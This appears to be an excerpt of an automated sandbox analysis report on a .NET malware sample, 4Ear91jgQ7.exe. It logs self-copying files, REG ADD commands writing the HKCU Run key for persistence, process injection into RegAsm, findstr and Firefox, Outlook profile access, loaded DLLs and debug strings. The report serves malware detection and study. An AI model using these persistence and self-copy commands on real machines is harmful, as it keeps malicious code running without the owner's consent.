            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2408
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasapi32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifSection loaded: wbemcomn.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: mscoree.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: version.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: wldp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: profapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: cryptsp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rsaenh.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rasapi32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rasman.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rtutils.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: secur32.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: schannel.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ntasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ncrypt.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: msasn1.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: gpapi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: amsi.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: userenv.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifSection loaded: wbemcomn.dll
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: 4Ear91jgQ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 4Ear91jgQ7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 4Ear91jgQ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000690D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: sers\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdbllu# source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: uu.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: findstr.pdb source: RegAsm.exe, 00000007.00000002.2374528641.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3323723136.000000000138E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: findstr.exe, 00000012.00000002.3330731863.00000000039CC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2481196233.000000000336C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002F59C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\pif\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2376548973.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.000000000353E000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2373359020.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Elaniabdv.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: oC:\Users\user\Documents\Elaniabdv.pdbd source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\pif\Elaniabdv.pdbbq source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Elaniabdv.pdb[ source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\pif\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000690D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbH source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdb37-8B11-F424491E3931}\Servererver32mmon Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0 source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3320587311.0000000000EDE000.00000002.00000001.01000000.00000008.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3320993994.0000000000EDE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: C:\Windows\Elaniabdv.pdbpdbbdv.pdbdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.PDB source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Dynamic.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: mscorlib.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb7 source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: findstr.exe, 00000012.00000002.3330731863.00000000039CC000.00000004.10000000.00040000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2481196233.000000000336C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002F59C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: findstr.pdbGCTL source: RegAsm.exe, 00000007.00000002.2374528641.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3323723136.000000000138E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Dynamic.pdb.> source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Xml.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: Microsoft.CSharp.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2376548973.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.000000000353E000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3330037437.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2373359020.0000000002F2F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.000000000689F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3224002755.00000000068D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: n4C:\Windows\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Xml.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: o.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: symbols\pif\Elaniabdv.pdbd source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: mscorlib.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.0000000001372000.00000004.00000020.00020000.00000000.sdmp, WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Drawing.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: \??\C:\Users\user\Documents\Elaniabdv.pdb source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3165515339.00000000013D3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdb source: 4Ear91jgQ7.exe, 4Ear91jgQ7.pif.pif.pif.pif.pif.67.dr, 4Ear91jgQ7.pif.pif.pif.32.dr, 4Ear91jgQ7.pif.pif.pif.pif.pif.pif.74.dr, 4Ear91jgQ7.pif.pif.13.dr, 4Ear91jgQ7.pif.pif.pif.pif.48.dr, 4Ear91jgQ7.pif.5.dr
            Source: Binary string: System.Core.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.pdbMZ source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\CanonCameraApp\bin\Debug\Secured\Elaniabdv.pdbts\4Ear91jgQ7.pif.pif.pif.PDB source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3163556977.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERFE22.tmp.dmp.61.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERFE22.tmp.dmp.61.dr
            Source: 4Ear91jgQ7.exeStatic PE information: 0xE66E8ABF [Fri Jul 4 10:02:39 2092 UTC]
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0641A028 push es; ret 0_2_0641A5F0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0641A5E0 push es; ret 0_2_0641A5F0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06416932 push es; ret 0_2_06416940
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477065 push es; ret 0_2_06477068
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647706D push es; ret 0_2_06477070
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477069 push es; ret 0_2_0647706C
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477015 push es; ret 0_2_06477024
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477011 push es; ret 0_2_06477014
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477025 push es; ret 0_2_0647702C
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647702D push es; ret 0_2_06477038
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06477039 push es; ret 0_2_0647703C
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06473091 push es; ret 0_2_064730A0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064790A1 push es; ret 0_2_064790D0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06476FD7 push es; ret 0_2_06476FE0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_06476FE1 push es; ret 0_2_06477010
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647E878 push eax; iretd 0_2_0647E879
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647E8D2 pushad ; iretd 0_2_0647E8D9
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A3018 push es; retf 0_2_064A3CC8
